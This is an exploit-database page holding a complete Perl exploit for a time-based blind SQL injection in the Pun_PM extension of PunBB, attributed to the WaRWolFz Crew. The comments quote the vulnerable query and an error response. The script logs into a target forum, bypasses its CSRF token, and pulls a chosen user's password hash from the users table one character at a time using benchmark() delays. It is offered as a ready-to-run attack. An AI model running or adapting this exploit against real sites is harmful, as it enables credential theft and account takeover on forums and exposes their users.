0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability
================================================================= PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability ================================================================= #!/usr/bin/perl # [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit # Author/s: Dante90, WaRWolFz Crew # Created: 2009.07.30 after 0 days the bug was discovered. # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat # Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_, # Chuzz, init, plucky, SaRtE, Lupo # Thanks For Testing: BlAcK HaT, l3d # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # Unit-X Project: www.unitx.net # ---- # Why I've decided to publish this? # Because in "Package: Pun_PM <= v1.2.9" the bug was fixed. # ---- # DETAILS # ./PunBB v1.3.*/extensions/pun_pm/functions.php # LINES: 504 -> 526 # function pun_pm_edit_message() # { # global $forum_db, $forum_user, $lang_pun_pm; # # $errors = array(); # # // Verify input data # $query = array( # 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body', # 'FROM' => 'pun_pm_messages m', # 'JOINS' => array( # array( # 'LEFT JOIN' => 'users AS u', # 'ON' => '(u.id = m.receiver_id)' # ), # ), # 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0' # ); # # ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null; # # $result = $forum_db->query_build($query) or error(__FILE__, __LINE__); # ---- # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1' # Error - PunBB # An error was encountered # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php # Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064). use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my ($UserName,$PassWord,$ID) = @ARGV; if (@ARGV < 3) { &usage(); exit(); } my $Message = ""; my $Hash = ""; my ($Time,$Time_Start,$Time_End,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(GET => $Host); my $Cookies = new HTTP::Cookies; my $HTTP = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; my $Referrer = "http://www.warwolfz.org/"; my $DefaultTime = request($Referrer); sub request { $Referrer = $_[0]; $Method->referrer($Referrer); $Start = Time::HiRes::time(); $Response = $HTTP->request($Method); $Response->is_success() or die "$Host : ", $Response->message,"\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub Blind_SQL_Jnjection { my ($dec,$hex) = @_; return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--"; } sub Clear() { my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear'; return system($launch); } sub Login() { if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) { $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!; } my $Get = $HTTP->get($Host.'login.php'); my $csrf_token = ""; if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input $csrf_token = $1; } my $Login = $HTTP->post($Host.'login.php', [ form_sent => '1', redirect_url => $Host.'login.php', csrf_token => $csrf_token, req_username => $UserName, req_password => $PassWord, save_pass => '1', login => 'Login', ]) || die $!; if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second. return 1; } else { return 0; } } sub usage { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub refresh { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print $_[0] ."\n"; print " * Victime Site: " . $_[1] . "\n"; print " * Default Time: " . $_[2] . " seconds\n"; print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n"; print " * BruteForcing N Char Hash: " . $_[6] . "\n"; print " * SQL Time: " . $_[5] . " seconds\n"; print " * Hash: " . $_[4] . "\n"; } sub Main(){ if (Login() == 1) { $Message = " * Logged in as: ".$UserName; } elsif (Login() == 0) { $Message = " * Login Failed."; refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1"); print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } for (my $I=1; $I<=40; $I++) { #N Hash characters for (my $J=0; $J<=15; $J++) { #0 -> F $Time_Start = time(); my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); $Time_End = time(); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); last; } } } if ($I == 1 && length $Hash < 1 && !$Hash) { print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } if ($I == 40) { print " * Exploit Successfully Executed *\n"; print " ------------------------------------------------------\n "; system("pause"); } } } Main(); #WaRWolFz Crew # 0day.today [2024-12-25] #